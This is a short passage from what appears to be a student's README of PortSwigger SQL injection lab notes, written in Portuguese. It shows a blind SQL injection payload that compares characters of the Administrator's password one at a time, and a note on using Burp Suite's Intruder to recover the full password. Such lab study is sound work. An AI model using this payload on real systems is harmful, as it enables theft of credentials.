HTsuyoshi/lecture-sandbox/Sec/Port_Swigger/sql_injection/README.md

 xyz' AND SUBSTRING((SELECT Password FROM Users WHERE Username = 'Administrator'), 1, 1) > 'm
 ```

-E ir comparando os caracteres do Administrador até descobrir a senha dele
+E ir comparando todos caracteres do Administrador até descobrir a senha completa (Para isso existe a ferramenta Intruder do burp suite)